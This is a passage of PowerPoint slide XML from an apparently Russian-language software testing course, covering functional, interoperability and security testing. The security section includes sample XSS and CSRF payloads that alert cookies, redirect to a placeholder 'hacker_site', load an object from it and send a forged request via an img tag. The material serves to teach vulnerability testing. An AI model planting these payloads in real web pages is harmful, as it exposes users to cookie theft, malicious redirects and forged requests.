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
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="280" r:id="rId2"/>
    <p:sldId id="308" r:id="rId3"/>
    <p:sldId id="281" r:id="rId4"/>
    <p:sldId id="336" r:id="rId5"/>
    <p:sldId id="337" r:id="rId6"/>
    <p:sldId id="338" r:id="rId7"/>
    <p:sldId id="339" r:id="rId8"/>
    <p:sldId id="340" r:id="rId9"/>
    <p:sldId id="341" r:id="rId10"/>
    <p:sldId id="28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667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17-Jan-15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rotesting.ru/testing/testcase.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owasp.org/index.php/XSS_Filter_Evasion_Cheat_Shee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wikipedia.org/wiki/%D0%9F%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%81%D1%8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Группы активностей тестирования могут быть направлены на проверку работоспособности системы ( или части системы), принимая за основу различные цели и причины для тестирования.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Типы тестирования определяются целями тестирования, которые могут быть следующими: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• Функция, выполняемая программой</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• Нефункциональная характеристика качества, такая как надежность или удобство использования </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• Структура или архитектура программы или системы </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• Подтверждение изменений, т.е. подтверждение, что дефект был исправлен (подтверждающее тестирование) и поиск непреднамеренных изменений (регрессионное тестирование)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Функции, которые выполняет система, подсистема или компонент, могут быть описаны в таких артефактах процесса разработки как спецификация требований, сценарии использования системы или функциональная спецификация, либо могут быть недокументированны. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Эти функции описывают, «что» эта система делает. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Функциональные тесты разрабатываются на основе функций и возможностей системы (описанных в документах или понятных </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>тестировщикам</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) и их взаимодействия со специфичными системами и могут быть выполнены на всех уровнях тестирования (например, тесты для компонентов могут основываться на спецификациях компонентов). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>С развитием сетевых технологий и интернета взаимодействие разных систем, сервисов и приложений друг с другом приобрело значительную актуальность, так как любые связанные с этим проблемы могут привести к падению авторитета компании, что как следствие повлечет за собой финансовые потери. Поэтому к тестированию взаимодействия стоит подходить со всей серьезностью.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>Тестирование взаимодействия</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Interoperability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>) – это функциональное тестирование, проверяющее способность приложения взаимодействовать с одним и более компонентами или системами.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Программное обеспечение с хорошими характеристиками взаимодействия может быть легко интегрировано с другими системами, не требуя каких-либо серьезных модификаций. В этом случае, количество изменений и время, требуемое на их выполнение, могут быть использованы для измерения возможности взаимодействия. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>Функциональное тестирование</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> рассматривает заранее указанное поведение и основывается на анализе спецификаций функциональности компонента или системы в целом.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Тестирование функциональности может проводиться в двух аспектах:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• требования</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• бизнес-процессы</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Тестирование в перспективе «требования» использует спецификацию функциональных требований к системе как основу для дизайна </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>тестовых случаев (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Cases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>. В этом случае необходимо сделать список того, что будет тестироваться, а что нет, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>приоритезировать</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> требования на основе рисков (если это не сделано в документе с требованиями), а на основе этого </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>приоритезировать</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> тестовые сценарии (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>cases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>). Это позволит сфокусироваться и не упустить при тестировании наиболее важный функционал.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Тестирование в перспективе «бизнес-процессы» использует знание этих самых бизнес-процессов, которые описывают сценарии ежедневного использования системы. В этой перспективе тестовые сценарии (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>), как правило, основываются на случаях использования системы (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>cases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>Тестирование безопасности</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> - это стратегия тестирования, используемая для проверки безопасности системы, а также для анализа рисков, связанных с обеспечением целостного подхода к защите приложения, атак хакеров, вирусов, несанкционированного доступа к конфиденциальным данным.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Общая стратегия безопасности основывается на трех основных принципах:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• конфиденциальность</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• целостность</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• доступность</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>В настоящее время наиболее распространенными видами </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>уязвимости в безопасности программного обеспечения</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> являются:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>XSS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Cross-Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> - это вид уязвимости программного обеспечения (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> приложений), при которой, на генерированной сервером странице, выполняются вредоносные </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипты</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, с целью атаки клиента.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>XSRF / CSRF (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> - это вид уязвимости, позволяющий использовать недостатки HTTP протокола, при этом злоумышленники работают по следующей схеме: ссылка на вредоносный сайт </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>установливается</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> на странице, пользующейся доверием у пользователя, при переходе по вредоносной ссылке выполняется </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, сохраняющий личные данные пользователя (пароли, платежные данные и т.д.), либо отправляющий СПАМ сообщения от лица пользователя, либо изменяет доступ к учетной записи пользователя, для получения полного контроля над ней.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>injections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> (SQL, PHP, ASP и т.д.)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> - это вид уязвимости, при котором становится возможно осуществить запуск исполняемого кода с целью получения доступа к системным ресурсам, несанкционированного доступа к данным либо выведения системы из строя.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Server-Side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Includes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> (SSI) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> - это вид уязвимости, использующий вставку серверных команд в HTML код или запуск их напрямую с сервера.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> - это вид уязвимости, при котором возможно получить несанкционированный доступ к учетной записи или документам другого пользователя</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>Как тестировать ПО на безопасность?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Приведем примеры тестирования ПО на предмет уязвимости в системе безопасности. Для этого Вам необходимо проверить Ваше программное обеспечение на наличия известных видов уязвимостей:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>XSS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Cross-Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Сами по себе XSS атаки могут быть очень разнообразными. Злоумышленники могут попытаться украсть ваши </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>куки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, перенаправить вас на сайт, где произойдет более серьезная атака, загрузить в память какой-либо вредоносный объект и т.д., всего </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>навсего</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>разместив вредоносный </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> у вас на сайте. Как пример, можно рассмотреть следующий </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, выводящий на экран ваши </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>куки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>);&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>либо </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>скрипт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> делающий </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>редирект</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> на зараженную страницу:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>window.parent.location.href='http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>hacker_site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>';&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>либо создающий вредоносный объект с вирусом и т.п.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>type=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>x-scriptlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>data=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>"http://hacker_site"&gt;&lt;/object&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Для просмотра большего количества примеров рекомендуем посетить страничку: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>XSS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>)... </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>XSRF / CSRF (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>Наиболее частыми CSRF атаками являются атаки использующие HTML &lt;IMG&gt; тэг или </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> объект </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>image</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>. Чаще всего атакующий добавляет необходимый код в электронное письмо или выкладывает на </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>веб-сайт</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>, таким образом, что при загрузке страницы осуществляется запрос, выполняющий вредоносный код. Примеры:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>IMG SRC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
              <a:t>src=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
              <a:t>"http://hacker_site/?command"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
